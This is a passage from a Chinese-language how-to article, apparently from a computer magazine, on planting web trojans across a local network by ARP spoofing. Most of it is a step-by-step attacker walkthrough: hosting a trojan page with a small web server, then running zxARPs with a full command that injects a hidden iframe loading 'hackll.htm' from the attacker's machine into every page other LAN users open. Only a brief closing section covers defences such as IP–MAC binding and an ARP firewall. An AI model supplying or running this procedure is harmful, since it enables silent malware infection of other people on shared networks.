新挂马方式开始流行 ARP挂马称雄局域网络(2)

　　第三步：开启本机Http服务

　　要让局域网中的其他主机能够访问到我们的网马，就要开启本机的Http服务。下载baby web server，这是一款简单的Web服务器软件，下载后直接运行，在其主界面中点击“服务→设置”。

　　将“网页目录”设置为网页木马所在的地方，例如C盘根目录“C:\“。点“确定”回主界面，然后再点“Start”按钮开启本机的Http服务(图3)。记得要将木马服务端和网页木马放到C盘根目录。

　　第四步：局域网挂马

　　最后该请我们的主角出场了，就是上文中提到的小工具，这个工具叫zxARPs，是一个通过ARP欺骗实现局域网挂马的工具。在使用zxARPs前我们要安装WinPcap，它是网络底层驱动包，没有它zxARPs就运行不了。

　　安装好后将zxARPs放到任意目录，然后运行“命令提示符”，进入zxARPs所在的目录，然后输入命令：zxARPs.exe -idx 0 -ip 192.168.0.1-192.168.0.255 -port 80 -insert "＜iframe src='http://192.168.0.2/hackll.htm' width=0 height=0＞"。回车后挂马就成功了。

　　从现在开始，局域网中的用户无论访问什么网站，都会运行我们的网页木马，因为zxARPs在用户打开网页的同时已经将挂马代码插入到正常网页中了。

　　ARP挂马防范技巧

　　从上文可见zxARPs的功能真的十分强大，但它毕竟是基于ARP欺骗原理的，只要局域网内的主机能够抵御ARP欺骗攻击，就可以完全无视zxARPs的挂马方法。

　　网管将局域网内所有的主机的IP地址和MAC地址进行绑定即可搞定。我们也可以下载“360ARP防火墙”来抵御ARP欺骗攻击，安装完成后点击界面上的“开启”按钮就可以让它保护我们免受ARP欺骗的攻击了(图4)。这时如果有人对你的主机进行ARP欺骗攻击，我们在可以点击“记录”按钮，查看攻击者的IP地址。

　　编辑点评：ARP欺骗可以实现多种攻击效果，本文介绍ARP欺骗挂马的只是其中的一种攻击方式，此外还有信息嗅探，主机网络限制等攻击方法。可见，ARP欺骗是局域网的头号大敌。因此我们在平时的安全防范中，不仅要做好本机的安全工作，还要对局域网的安全作一定的防御，这样才能更安全地使用电脑